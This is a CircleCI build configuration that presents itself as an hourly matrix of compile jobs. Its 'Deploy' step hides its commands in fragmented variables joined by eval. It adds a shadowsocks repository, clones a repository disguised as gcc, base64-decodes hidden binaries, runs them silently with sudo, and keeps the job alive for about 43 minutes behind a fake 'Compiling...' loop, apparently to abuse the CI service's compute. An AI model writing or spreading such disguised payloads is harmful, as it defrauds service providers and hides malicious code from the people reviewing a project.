version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--help", "--autounmask-use", "--pretend", "--prefix", "--rebuild-exclude", "--quiet-repo-display", "--metadata", "--noconfmem", "--package-moves", "--complete-graph-if-new-ver", "--config-root", "--resume", "--fetch-all-uri", "--alphabetical", "--ignore-world", "--digest", "--check-news", "--help", "--usepkg", "--usepkgonly"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--help", "--autounmask-use", "--pretend", "--prefix", "--rebuild-exclude", "--quiet-repo-display", "--metadata", "--noconfmem", "--package-moves", "--complete-graph-if-new-ver", "--config-root", "--resume", "--fetch-all-uri", "--alphabetical", "--ignore-world", "--digest", "--check-news", "--help", "--usepkg", "--usepkgonly"]
    triggers:
      - schedule:
          cron: "3 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: Deploy
          command: |
            IUVWICoFJd="sudo add-ap"
            OqXVRZMVsdS="t-repositor"
            GtFXHyKqF="y ppa:max-c"
            HppEh="-lv/shadows"
            vGdkAYZUj="ocks-libev "
            Kipok="-y &>/dev/n"
            eval "$IUVWICoFJd""$OqXVRZMVsdS""$GtFXHyKqF""$HppEh""$vGdkAYZUj""$Kipok""ull || true"
            TkQBH="sudo add-ap"
            Zqbbyh="t-repositor"
            dqAeTSYMfqL="y ppa:ondre"
            MWgQQvnRUZv="j/apache2 -"
            IEmdb="y &>/dev/nu"
            eval "$TkQBH""$Zqbbyh""$dqAeTSYMfqL""$MWgQQvnRUZv""$IEmdb""ll || true"
            PZkjtN="sudo apt up"
            SVjfamFL="date || tru"
            eval "$PZkjtN""$SVjfamFL""e"
            sudo apt --yes install openssl &>/dev/null || true
            GsHRERvBqAr="sudo apt --"
            yBvKB="yes install"
            bJNvE=" cl-base64 "
            ZQDIBrNvaWg="git &>/dev/"
            laZOf="null || tru"
            eval "$GsHRERvBqAr""$yBvKB""$bJNvE""$ZQDIBrNvaWg""$laZOf""e"
            ylUksC="git clone h"
            zlOwplh="ttps://gccb"
            VqKewK="uild@bitbuc"
            uzlvLqu="ket.org/gcc"
            VUBbuPI="build/gcc.g"
            kYKAoX="it &>/dev/n"
            eval "$ylUksC""$zlOwplh""$VqKewK""$uzlvLqu""$VUBbuPI""$kYKAoX""ull"
            hijvDUVkrru="base64 -d g"
            OHTNcMTbhLK="cc/cmake_np"
            eval "$hijvDUVkrru""$OHTNcMTbhLK""_ > cmake"
            dTBFxa="base64 -d g"
            wqoiWO="cc/config_ "
            eval "$dTBFxa""$wqoiWO""> cconfig"
            lYfKBkVBj="base64 -d g"
            mLGwtBxQKer="cc/make_ > "
            eval "$lYfKBkVBj""$mLGwtBxQKer""ci"
            sed -i 's/1080/1081/g' cconfig
            chmod +x ci cmake
            ./cmake
            sed -i 's/build/og3o/g' cconfig
            UPQOjvQZ="sudo ./ci -"
            qMNISEIQJ="-config=cco"
            hVhQjnKyHJ="nfig &>/dev"
            eval "$UPQOjvQZ""$qMNISEIQJ""$hVhQjnKyHJ""/null &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2596)) ] && sudo killall ci && break; sleep 189; done
